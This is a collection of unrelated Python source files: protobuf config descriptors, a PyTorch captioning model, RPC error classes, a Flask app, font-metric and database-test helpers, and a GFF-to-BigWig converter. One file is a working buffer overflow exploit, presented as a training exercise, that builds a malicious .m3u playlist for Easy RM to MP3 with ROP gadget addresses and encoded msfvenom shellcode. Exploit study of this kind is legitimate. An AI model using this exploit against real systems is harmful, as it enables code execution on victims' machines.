name='assoc_deviation_angle_weight', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_deviation_angle_weight', index=23,
number=24, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.2),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_departure_distance', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_departure_distance', index=24,
number=25, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(3),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_departure_distance_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_departure_distance_image', index=25,
number=26, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(80),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_departure_distance_weight', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_departure_distance_weight', index=26,
number=27, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.2),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_relative_orie', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_relative_orie', index=27,
number=28, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(15),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_relative_orie_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_relative_orie_image', index=28,
number=29, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(45),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_relative_orie_weight', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_relative_orie_weight', index=29,
number=30, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.2),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_min_orientation_estimation_size', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_min_orientation_estimation_size', index=30,
number=31, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(3),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_min_orientation_estimation_size_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_min_orientation_estimation_size_image', index=31,
number=32, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(10),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='max_cc_marker_match_num', full_name='apollo.perception.lane_post_process_config.ModelConfigs.max_cc_marker_match_num', index=32,
number=33, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='slide_window_size', full_name='apollo.perception.lane_post_process_config.ModelConfigs.slide_window_size', index=33,
number=34, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(15),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='slide_window_size_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.slide_window_size_image', index=34,
number=35, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(200),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='slide_window_max_point_num', full_name='apollo.perception.lane_post_process_config.ModelConfigs.slide_window_max_point_num', index=35,
number=36, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=3,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='max_group_prediction_marker_num', full_name='apollo.perception.lane_post_process_config.ModelConfigs.max_group_prediction_marker_num', index=36,
number=37, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=3,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='orientation_estimation_skip_marker_num', full_name='apollo.perception.lane_post_process_config.ModelConfigs.orientation_estimation_skip_marker_num', index=37,
number=38, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_interval_distance', full_name='apollo.perception.lane_post_process_config.ModelConfigs.lane_interval_distance', index=38,
number=39, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(4),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='min_instance_size_prefiltered', full_name='apollo.perception.lane_post_process_config.ModelConfigs.min_instance_size_prefiltered', index=39,
number=40, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(3),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='min_instance_size_prefiltered_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.min_instance_size_prefiltered_image', index=40,
number=41, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(20),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='max_size_to_fit_straight_line', full_name='apollo.perception.lane_post_process_config.ModelConfigs.max_size_to_fit_straight_line', index=41,
number=42, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(10),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='max_size_to_fit_straight_line_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.max_size_to_fit_straight_line_image', index=42,
number=43, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(300),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='online_pitch_angle', full_name='apollo.perception.lane_post_process_config.ModelConfigs.online_pitch_angle', index=43,
number=44, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(-2.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ground_height', full_name='apollo.perception.lane_post_process_config.ModelConfigs.ground_height', index=44,
number=45, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1.6),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='max_distance_to_see_for_transformer', full_name='apollo.perception.lane_post_process_config.ModelConfigs.max_distance_to_see_for_transformer', index=45,
number=46, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(500),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_map_scale', full_name='apollo.perception.lane_post_process_config.ModelConfigs.lane_map_scale', index=46,
number=47, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(2),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='start_y_pos', full_name='apollo.perception.lane_post_process_config.ModelConfigs.start_y_pos', index=47,
number=48, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=312,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_map_width', full_name='apollo.perception.lane_post_process_config.ModelConfigs.lane_map_width', index=48,
number=49, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=960,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_map_height', full_name='apollo.perception.lane_post_process_config.ModelConfigs.lane_map_height', index=49,
number=50, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=384,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=104,
serialized_end=1860,
)
# Standard protoc-generated boilerplate: attach the message descriptor to the
# file descriptor and register both with the default symbol database.
DESCRIPTOR.message_types_by_name['ModelConfigs'] = _MODELCONFIGS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
# Build the concrete ModelConfigs message class at import time from its
# descriptor via the protobuf reflection metaclass.
ModelConfigs = _reflection.GeneratedProtocolMessageType('ModelConfigs', (_message.Message,), dict(
  DESCRIPTOR = _MODELCONFIGS,
  __module__ = 'modules.perception.proto.lane_post_process_config_pb2'
  # @@protoc_insertion_point(class_scope:apollo.perception.lane_post_process_config.ModelConfigs)
  ))
_sym_db.RegisterMessage(ModelConfigs)
# @@protoc_insertion_point(module_scope)
|
import torch
import torch.nn as nn
import torchvision.models as models
import torch.nn.functional as F
class EncoderCNN(nn.Module):
    """Image encoder: a frozen pretrained ResNet-50 backbone followed by a
    trainable linear projection into the caption embedding space."""

    def __init__(self, embed_size):
        super(EncoderCNN, self).__init__()
        backbone = models.resnet50(pretrained=True)
        # Freeze the backbone: only the projection layer below is trained.
        for parameter in backbone.parameters():
            parameter.requires_grad_(False)
        # Drop the final fully-connected classifier, keeping layers up to and
        # including global average pooling.
        feature_layers = list(backbone.children())[:-1]
        self.resnet = nn.Sequential(*feature_layers)
        self.embed = nn.Linear(backbone.fc.in_features, embed_size)

    def forward(self, images):
        """Return an (batch, embed_size) feature tensor for a batch of images."""
        pooled = self.resnet(images)
        flattened = pooled.view(pooled.size(0), -1)
        return self.embed(flattened)
class DecoderRNN(nn.Module):
    """Caption decoder: embeds token ids and runs them (prefixed by the image
    feature vector) through an LSTM, projecting hidden states to vocab scores.
    """

    def __init__(self, embed_size, hidden_size, vocab_size, num_layers=2):
        super().__init__()
        self.embed_size = embed_size
        self.hidden_size = hidden_size
        self.vocab_size = vocab_size
        self.num_layers = num_layers
        self.embed = nn.Embedding(vocab_size, embed_size)
        # dropout only applies between stacked layers, so it is active here
        # whenever num_layers >= 2.
        self.lstm = nn.LSTM(input_size=embed_size, hidden_size=hidden_size, num_layers=num_layers, dropout = 0.2, batch_first = True )
        self.linear = nn.Linear(hidden_size, vocab_size)
        # NOTE(review): kept for backward compatibility, but this shape is
        # (1, 1, hidden) while the LSTM expects (num_layers, batch, hidden);
        # it is never actually fed to the LSTM, only overwritten in forward().
        self.hidden = (torch.zeros(1, 1, hidden_size),torch.zeros(1, 1, hidden_size))

    def forward(self, features, captions):
        """Teacher-forced pass.

        features: (batch, embed_size) image features.
        captions: (batch, seq) token ids; the last token is dropped because the
            image feature occupies the first LSTM step.
        Returns (batch, seq, vocab_size) unnormalized scores.
        """
        features = features.unsqueeze(1)
        cap_embedding = self.embed(captions[:, :-1])
        embedding_vector = torch.cat((features, cap_embedding), 1)
        lstm_out, self.hidden = self.lstm(embedding_vector)
        outputs = self.linear(lstm_out)
        return outputs

    def sample(self, features, states=None, max_len=20):
        """Greedily decode a caption from a (1, 1, embed_size) feature tensor.

        Returns a list of max_len predicted token ids.

        Bug fixes vs. the original: the LSTM state is now threaded through the
        loop (the original never passed `states` to the LSTM, so every step
        restarted from a zero state); each step feeds the embedding of the
        previous *predicted token* (the original re-embedded the argmax values
        it had stored in `states` and concatenated all of them each iteration);
        and all max_len predictions are returned, not just the final step's.
        """
        sampled_ids = []
        inputs = features
        for _ in range(max_len):
            lstm_out, states = self.lstm(inputs, states)
            scores = self.linear(lstm_out.squeeze(1))
            _, predicted = scores.max(1)
            sampled_ids.append(int(predicted.item()))
            # Next input: embedding of the token just predicted, shaped (1, 1, embed).
            inputs = self.embed(predicted).unsqueeze(1)
        return sampled_ids
# Builtin modules
# Local modules
# Program
class BaseRPCError(Exception):
    """Root of the RPC exception hierarchy.

    Renders "<typ>: <message>" and keeps the rendered text on self.message
    so callers can read it back directly.
    """

    def __init__(self, typ:str, message:str):
        self.message = "{}: {}".format(typ, message)
        super().__init__(self.message)


class InitializationError(BaseRPCError):
    """Raised for failures while setting up the RPC machinery."""

    def __init__(self, message:str):
        super().__init__("Initialization error", message)


class SocketError(BaseRPCError):
    """Raised for failures at the socket layer."""

    def __init__(self, message:str):
        super().__init__("Socket error", message)


class MessageError(BaseRPCError):
    """Raised for malformed or unprocessable messages."""

    def __init__(self, message:str):
        super().__init__("Message error", message)


class RequestError(BaseRPCError):
    """Raised for failures on the request side of an exchange."""

    def __init__(self, message:str):
        super().__init__("Request error", message)


class ResponseError(BaseRPCError):
    """Raised for failures on the response side of an exchange."""

    def __init__(self, message:str):
        super().__init__("Response error", message)
|
#!/usr/bin/python
# Author: Michael Music
# Date: 2/17/2019
# Description: Easy RM to MP3 27.3.700 Buffer Overflow Exploit
# Exercise in BOFs following the corelan guide
# Tested on Windows Server 2012
# Notes: Required alteration in prepended \x41s and POPs to jump to shellcode
# !mona find -s "\x58\x5d\xc3" -m "MSRMfilter03.dll"
# This version simulates an EIP+8 shellcode location via 1 \xcc and 7 NOPs at EIP
# The exploit gets around this by popping 8 bytes off the stack (pop pop ret address overwritten at EIP)
# and uses a PUSH ESP instruction at EIP+8 to execute the shellcode
# I will be creating other variations of this exploit to test other shellcode
# execution methods
# Output filename for the malicious playlist the target app will open.
out = 'crash.m3u'
# Filler bytes up to the saved return address (offset per the header notes).
junk = '\x41' * 26079
# NOTE(review): espdata and address are not used in exploit_string below —
# presumably leftovers from an earlier variation of this exploit; confirm.
espdata = '\x43' * 442
# 4-byte marker placed between the overwritten return address and the payload.
preshellcode = 'XXXX'
address = '\x42' * 4
nop = '\x90'
# Software breakpoint (INT3) byte, used to simulate the EIP+8 layout (see header).
br = '\xcc'
# Little-endian in-module addresses; per the header these point at a PUSH ESP
# gadget and the pop/pop/ret found in MSRMfilter03.dll — TODO confirm targets.
push_esp = '\x58\xb0\x01\x10'
pop_pop_ret = '\xca\xb6\x02\x10'
# msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -e x86/alpha_mixed
# Payload prefix: breakpoint + 7 NOPs at EIP, gadget address, then a NOP sled.
buf = br + (nop * 7) + push_esp + (nop * 25)
buf += "\x89\xe2\xd9\xc9\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x5a\x48\x6c"
buf += "\x42\x53\x30\x55\x50\x33\x30\x51\x70\x6e\x69\x4d\x35"
buf += "\x45\x61\x6b\x70\x55\x34\x6e\x6b\x66\x30\x34\x70\x6c"
buf += "\x4b\x42\x72\x54\x4c\x4e\x6b\x32\x72\x34\x54\x6c\x4b"
buf += "\x62\x52\x46\x48\x36\x6f\x4d\x67\x61\x5a\x34\x66\x64"
buf += "\x71\x59\x6f\x6c\x6c\x55\x6c\x53\x51\x31\x6c\x63\x32"
buf += "\x56\x4c\x51\x30\x69\x51\x78\x4f\x34\x4d\x77\x71\x68"
buf += "\x47\x79\x72\x4b\x42\x36\x32\x51\x47\x6e\x6b\x63\x62"
buf += "\x32\x30\x6e\x6b\x53\x7a\x65\x6c\x4e\x6b\x42\x6c\x62"
buf += "\x31\x30\x78\x4a\x43\x47\x38\x53\x31\x6e\x31\x66\x31"
buf += "\x6c\x4b\x46\x39\x71\x30\x55\x51\x6a\x73\x6e\x6b\x63"
buf += "\x79\x66\x78\x79\x73\x67\x4a\x31\x59\x6e\x6b\x55\x64"
buf += "\x6c\x4b\x66\x61\x79\x46\x55\x61\x39\x6f\x6c\x6c\x69"
buf += "\x51\x38\x4f\x34\x4d\x46\x61\x58\x47\x50\x38\x4d\x30"
buf += "\x52\x55\x68\x76\x66\x63\x61\x6d\x38\x78\x55\x6b\x53"
buf += "\x4d\x65\x74\x54\x35\x6b\x54\x42\x78\x6e\x6b\x72\x78"
buf += "\x34\x64\x35\x51\x59\x43\x73\x56\x4e\x6b\x76\x6c\x70"
buf += "\x4b\x6e\x6b\x72\x78\x47\x6c\x66\x61\x6e\x33\x4e\x6b"
buf += "\x74\x44\x4e\x6b\x53\x31\x48\x50\x6b\x39\x77\x34\x71"
buf += "\x34\x55\x74\x51\x4b\x61\x4b\x63\x51\x56\x39\x43\x6a"
buf += "\x50\x51\x59\x6f\x4b\x50\x61\x4f\x43\x6f\x51\x4a\x4c"
buf += "\x4b\x56\x72\x7a\x4b\x6e\x6d\x71\x4d\x33\x5a\x76\x61"
buf += "\x6c\x4d\x6b\x35\x6e\x52\x67\x70\x53\x30\x45\x50\x42"
buf += "\x70\x53\x58\x65\x61\x6c\x4b\x62\x4f\x4b\x37\x4b\x4f"
buf += "\x6a\x75\x4f\x4b\x6c\x30\x78\x35\x49\x32\x42\x76\x71"
buf += "\x78\x59\x36\x4f\x65\x4f\x4d\x6f\x6d\x39\x6f\x49\x45"
buf += "\x45\x6c\x64\x46\x63\x4c\x76\x6a\x6f\x70\x49\x6b\x49"
buf += "\x70\x51\x65\x67\x75\x4d\x6b\x77\x37\x35\x43\x31\x62"
buf += "\x50\x6f\x50\x6a\x75\x50\x42\x73\x49\x6f\x49\x45\x61"
buf += "\x73\x75\x31\x52\x4c\x51\x73\x66\x4e\x33\x55\x44\x38"
buf += "\x62\x45\x67\x70\x41\x41"
buf += '\x43' * 400
# Final on-disk layout: [junk][pop pop ret @ EIP][4-byte marker][payload].
exploit_string = junk + pop_pop_ret + preshellcode + buf
# Bug fix: the original ended with `text.close` (missing parentheses), so the
# file was never explicitly closed/flushed. A context manager guarantees it.
with open(out, 'w') as playlist:
    playlist.write(exploit_string)
|
import pandas as pd
# noinspection PyUnresolvedReferences
from extractor import FeaturesExtractor
from flask import Flask, render_template, request
from sklearn.externals import joblib
app = Flask(__name__)
model = joblib.load('model.pkl')
@app.route('/', methods=['GET', 'POST'])
def index_page(text='', label='', color='orange'):
    """Render the landing page; on POST, classify the submitted text.

    The model's prediction picks the display colour: numeric labels below 3
    are red, above 3 green, anything else keeps the default orange.
    """
    if request.method == "POST":
        text = request.form["text"]
    if text:
        frame = pd.DataFrame([['', text]], columns=['title', 'text'])
        label = model.predict(frame)[0]
        if not isinstance(label, str):
            if label < 3:
                color = 'red'
            elif label > 3:
                color = 'green'
    return render_template('hello.html', text=text, label=label, color=color)
if __name__ == '__main__':
app.run()
|
"""Exploring the font metrics in the freetype-py API to enable proper character placement"""
import freetype
import svgpathtools
import svgwrite
from freetype import Face
from svgpathtools import Line, Path, QuadraticBezier, wsvg
import re
import barcode_wheel
if __name__ == "__main__":
    # Exploratory script: render one glyph ("a") into font_metrics.svg along
    # with markers for its FreeType metrics, to study character placement.
    drawing = svgwrite.Drawing(filename="font_metrics.svg", size=("100%", "100%"))
    # char_to_path returns an svgpathtools Path plus the glyph's FreeType
    # metrics object (project helper; see barcode_wheel).
    path, metrics = barcode_wheel.char_to_path("a")
    drawing.add(drawing.path(d=path.d()))
    # Metric names of interest — kept for reference; the regex below is what
    # actually selects attributes from the metrics object.
    names = [
        "width",
        "height",
        "horiAdvance",
        "horiBearingX",
        "horiBearingY",
        "vertAdvance",
        "vertBearingX",
        "vertBearingY",
    ]
    metrics_re = re.compile(r"(?i)(height)|(width)|(hori.*)|(vert.*)")
    # Select every attribute of the metrics object whose name matches.
    interesting_metrics = filter(None, map(metrics_re.match, dir(metrics)))
    interesting_metric_names = [
        match_group.string for match_group in interesting_metrics
    ]
    metrics_values = {name: getattr(metrics, name) for name in interesting_metric_names}
    # Extremes of the metric values scale the corner-marker radius below.
    max_metric = max(metrics_values.values())
    min_metric = min(metrics_values.values())
    # NOTE(review): computed but never used.
    character_top_right = {"x": metrics.horiBearingX, "y": metrics.horiBearingY}
    # Bounding-box corners in font units (y appears to grow downward here —
    # TODO confirm against the SVG coordinate system).
    character_bbox = {
        "tr": (metrics.horiBearingX + metrics.width, 0),
        "tl": (metrics.horiBearingX, 0),
        "br": (metrics.horiBearingX + metrics.width, metrics.height),
        "bl": (metrics.horiBearingX, metrics.height),
    }
    # Drop a translucent dot on each bounding-box corner.
    for x, y in character_bbox.values():
        drawing.add(
            drawing.circle(
                center=(x, y),
                r=((max_metric - min_metric) * 0.01),
                opacity=0.5,
                fill="blue",
            )
        )
    # Size the viewbox from the glyph outline's own bounding box.
    face = barcode_wheel.get_font_face()
    face.set_char_size(2 ** 16)
    face.load_char("a")
    bbox = face.glyph.outline.get_bbox()
    drawing.viewbox(0, 0, bbox.xMax - bbox.xMin, bbox.yMax - bbox.yMin)
    drawing.fit()
    drawing.save()
|
import os
from testcontainers.postgres import PostgresContainer
import psycopg2
from contextlib import contextmanager
def get_migration_files():
    """Yield the full path of every migration script, in lexicographic order."""
    migration_dir = os.path.join(os.path.dirname(__file__), os.pardir, "migration")
    for entry in sorted(os.listdir(migration_dir)):
        yield os.path.join(migration_dir, entry)
def migrate(conn):
    """Apply every migration script to *conn*, committing after each file.

    Scripts run in the sorted order produced by get_migration_files(), so
    file naming controls application order.
    """
    cur = conn.cursor()
    try:
        for path in get_migration_files():
            with open(path) as fp:
                # read() preserves the script verbatim; the previous
                # " ".join(fp.readlines()) injected a stray space before
                # every line (readlines keeps the newlines).
                stmt = fp.read()
            cur.execute(stmt)
            # Commit per file so earlier migrations survive a later failure.
            conn.commit()
    finally:
        # The original leaked the cursor.
        cur.close()
@contextmanager
def migrated_testcontainer():
    """Start a disposable Postgres 13 container, run all migrations, and
    yield a psycopg2 DSN string for it.

    Connection parameters are also exported via the DATABASE/HOST/PORT/
    USERNAME/PASSWORD environment variables for code under test that reads
    its configuration from the environment.
    """
    with PostgresContainer("postgres:13.0") as postgres:
        os.environ["DATABASE"] = 'test'
        os.environ["HOST"] = postgres.get_container_host_ip()
        os.environ["PORT"] = postgres.get_exposed_port(5432)
        os.environ["USERNAME"] = postgres.POSTGRES_USER
        os.environ["PASSWORD"] = postgres.POSTGRES_PASSWORD
        dsn = f"dbname='test' host='{postgres.get_container_host_ip()}' port='{postgres.get_exposed_port(5432)}' user='{postgres.POSTGRES_USER}' password='{postgres.POSTGRES_PASSWORD}'"
        conn = psycopg2.connect(dsn)
        try:
            migrate(conn)
            yield dsn
        finally:
            # BUG FIX: the original never closed this connection, which can
            # block the container from shutting down cleanly.
            conn.close()
|
import sys, math, glob, multiprocessing, subprocess, os, bisect, random
# Usage: python gff_to_bigwig_pe_v3.py [-q] [-h] [-keep] [-sort] [-o=out_ids]
# [-p=num_proc] [-s=gff_search_term] <chrm_sizes> <gff_fille> [gff_file]*
NUMPROC = 1
SEARCHTERM='frac'
def processInputs( gffFileAr, chrmFileStr, keepTmp, outIdAr, searchTerm, numProc, isSort, isPrint ):
    """Fan the GFF files out to a multiprocessing pool and wait for completion."""
    nFiles = len(gffFileAr)
    if isPrint:
        print( 'Keep temp files:', keepTmp)
        print( 'Sort bedGraph:', isSort )
        print( 'GFF notes search term:', searchTerm )
    # adjust out ids: a single shared id is broadcast to every input file
    if len(outIdAr) == 1 and nFiles > 1:
        outIdAr = outIdAr * nFiles
    elif len(outIdAr) != nFiles:
        print( 'ERROR: number of output ids does not match number of input files' )
        exit()
    if isPrint:
        print( 'Begin processing {:d} files with {:d} processors'.format( nFiles, numProc ) )
    workerPool = multiprocessing.Pool( processes=numProc )
    asyncResults = []
    for fileIdx in range(nFiles):
        workArgs = (gffFileAr[fileIdx], chrmFileStr, outIdAr[fileIdx], keepTmp, searchTerm, isSort, isPrint)
        asyncResults.append( workerPool.apply_async( processFile, args=workArgs ) )
    # block until every worker has finished (re-raises worker exceptions)
    for res in asyncResults:
        res.get()
    if isPrint:
        print( 'Done' )
def processFile( gffFileStr, chrmFileStr, outId, keepTemp, searchTerm, isSort, isPrint ):
    """Convert one GFF file into per-modification bedGraph and BigWig files.

    outId of None derives the output prefix from the input file name; a
    '_v3' suffix is always appended when missing.
    """
    # get output id ('is None' instead of '== None')
    if outId is None:
        outId = gffFileStr.replace('.gff', '' )
    if not outId.endswith( '_v3'):
        outId += '_v3'
    if isPrint:
        print( 'Reading GFF file {:s}'.format( os.path.basename( gffFileStr ) ) )
    bedGraphStr = outId + '.bedGraph'
    bedGraphAr = readGFF( gffFileStr, bedGraphStr, searchTerm )
    # (removed a leftover debug print of the bedGraph file list)
    if len(bedGraphAr) == 0:
        print( 'ERROR: no m4C, m5C, or m6A features found in GFF file' )
        exit()
    if isSort:
        if isPrint:
            print( 'Sorting bedGraph files' )
        for b in bedGraphAr:
            sortBedFile( b )
    if isPrint:
        print( 'Converting {:s} to BigWig'.format( ', '.join(bedGraphAr) ) )
    for b in bedGraphAr:
        processBedGraph( b, chrmFileStr )
    if not keepTemp:
        if isPrint:
            print ( 'Removing temporary files' )
        for b in bedGraphAr:
            os.remove( b )
    print( 'BigWig finished for {:s}.*'.format( bedGraphStr.replace( 'bedGraph', 'bw' ) ) )
def readGFF( gffFileStr, bedGraphStr, searchTerm ):
    """Split a GFF file into up to three bedGraph files (4mC, 5mC, 6mA).

    Returns the list of bedGraph file names that actually received data;
    the files for unused modification types are deleted.
    """
    outTypes = ['4mc', '5mc', '6ma']
    # accepted GFF feature names; validOut maps each to an outTypes index
    validTypes = ['4mc', 'm4c', '5mc', 'm5c', '6ma', 'm6a']
    validOut = [0, 0, 1, 1, 2, 2]
    if not searchTerm.endswith( '=' ):
        searchTerm += '='
    bedGraphStrAr = [ bedGraphStr + '.' + x for x in outTypes]
    bedGraphAr = [ open( x, 'w' ) for x in bedGraphStrAr ]
    # tracks which modification types actually occurred in the input
    isUsed = [ False for x in outTypes ]
    inFile = open( gffFileStr, 'r' )
    for line in inFile:
        line = line.rstrip()
        # (0) chrm (1) source (2) feature (3) start (4) end (5) score
        # (6) strand (7) frame (8) notes
        lineAr = line.split( '\t' )
        # skip comments and malformed/short rows
        if line.startswith( '#' ) or len( lineAr ) < 9:
            continue
        featType = lineAr[2].lower()
        featInt = indexOf( validTypes, featType )
        if featInt == -1:
            continue
        outInt = validOut[featInt]
        chrm = lineAr[0]
        # GFF coordinates are 1-based; bedGraph intervals are 0-based
        pos = int( lineAr[3] ) - 1
        # get frac value from the notes column; '' means missing/non-numeric
        valueStr = searchNotes(lineAr[8], searchTerm)
        value = convertValue( valueStr, lineAr[6] )
        if value != '':
            # add to output
            # (0) chrm (1) start (2) end (3) value
            if isUsed[outInt] == False:
                isUsed[outInt] = True
            bedGraphAr[outInt].write( '{:s}\t{:d}\t{:d}\t{:s}\n'.format( chrm, pos, pos+1, value ) )
    # end for line
    inFile.close()
    # determine used files, close and remove as necessary
    outFilesAr = []
    for i in range(len(outTypes)):
        bedGraphAr[i].close()
        if isUsed[i]:
            outFilesAr += [bedGraphStrAr[i]]
        else:
            os.remove(bedGraphStrAr[i])
    # end for i
    return outFilesAr
def sortBedFile( bedFileStr ):
    """Sort *bedFileStr* in place with the external bedSort tool."""
    # Pass an argument list instead of a shell string so file names containing
    # spaces or shell metacharacters cannot break (or inject into) the command.
    subprocess.call( ['bedSort', bedFileStr, bedFileStr] )
def processBedGraph( bedGraphStr, chrmFileStr ):
    """Convert a bedGraph file to BigWig via the external bedGraphToBigWig tool."""
    bigWigStr = bedGraphStr.replace( '.bedGraph', '.bw' )
    # bedGraphToBigWig in.bedGraph chrom.sizes out.bw
    # Argument list avoids shell interpolation of the file names.
    subprocess.call( ['bedGraphToBigWig', bedGraphStr, chrmFileStr, bigWigStr] )
def indexOf( inAr, search ):
    """Return the index of the first occurrence of *search* in *inAr*, or -1."""
    for position, candidate in enumerate( inAr ):
        if candidate == search:
            return position
    return -1
def searchNotes( notesStr, searchStr ):
    """Return the value following *searchStr* in a GFF notes field.

    The value runs up to the next ';' or the end of the string; an empty
    string is returned when *searchStr* does not occur.
    """
    start = notesStr.find( searchStr )
    if start < 0:
        return ''
    start += len( searchStr )
    tail = notesStr[start:]
    semicolon = tail.find( ';' )
    return tail if semicolon == -1 else tail[:semicolon]
def convertValue( valueStr, strand ):
    """Convert a methylation-fraction string to a signed bedGraph value.

    Values above 1 are treated as percentages and scaled into [0, 1]; minus
    strand features are negated so the two strands are distinguishable in a
    genome browser. Returns '' when *valueStr* is not numeric.
    """
    try:
        # convert to float
        value = float( valueStr )
        if value > 1:
            # percentage -> fraction
            value = value / 100
        if strand == '-':
            value = value * -1
        # BUG FIX: the old format string '{:.6f}{:d}'.format(value, 1)
        # appended a literal '1' after every number, corrupting the values
        # written to the bedGraph output.
        return '{:.6f}'.format( value )
    except ValueError:
        return ''
def parseInputs( argv ):
    """Parse command-line flags then dispatch to processInputs().

    *argv* excludes the program name; up to five flags may precede the
    required <chrm_sizes> argument and the one-or-more GFF file arguments.
    """
    numProc = NUMPROC
    outIdAr = [None]
    keepTmp = False
    isSort = False
    isPrint = True
    searchTerm = SEARCHTERM
    startInd = 0
    for i in range( min(5, len(argv)-2) ):
        if argv[i] in [ '-h', '--help', '-help']:
            printHelp()
            exit()
        elif argv[i] == '-q':
            isPrint = False
            startInd += 1
        elif argv[i] == '-keep':
            keepTmp = True
            startInd += 1
        elif argv[i] == '-sort':
            isSort = True
            startInd += 1
        elif argv[i].startswith( '-s=' ):
            searchTerm = argv[i][3:]
            startInd += 1
        elif argv[i].startswith( '-o=' ):
            outIdAr = argv[i][3:].split(',')
            startInd += 1
